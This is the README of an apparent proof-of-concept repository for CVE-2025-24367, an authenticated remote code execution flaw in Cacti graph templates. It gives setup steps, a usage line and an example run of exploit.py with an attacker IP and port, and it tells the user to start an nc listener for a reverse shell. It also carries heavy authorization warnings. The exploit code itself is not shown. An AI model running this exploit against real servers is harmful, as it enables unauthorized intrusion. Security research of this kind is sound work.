Proof of Concept for CVE-2025-24367

# CVE-2025-24367 - Cacti Authenticated Graph Template RCE
# Usage & Safety
> **Important — Read this first:**
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.
---
## Requirements
- Python 3.8+
```bash
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
```
---
## Usage
```text
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
```
### Example
Before running the script, make sure you have an `nc` listener running. Run the script without `--proxy` unless you are debugging:
```bash
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
```
---
## VERY IMPORTANT WARNINGS
- **Do not run this against production systems or any system you do not own or have explicit permission to test.**
- Always obtain **written authorization** before performing security testing.
- Use isolated lab environments (e.g., VMs, containers, or purpose-built test networks) for experimentation.
- Your organization may have reporting and disclosure policies — follow them.
- The authors accept no responsibility for misuse of this code.
**Final reminder:** This script and README are for **educational use only**. Never use these tools to access systems unlawfully.

```text
[4.0K] /data/pocs/92cbbde36402f290f268b52109a526ab51b5a843
├── [8.3K] exploit.py
└── [1.6K] README.md

1 directory, 2 files
```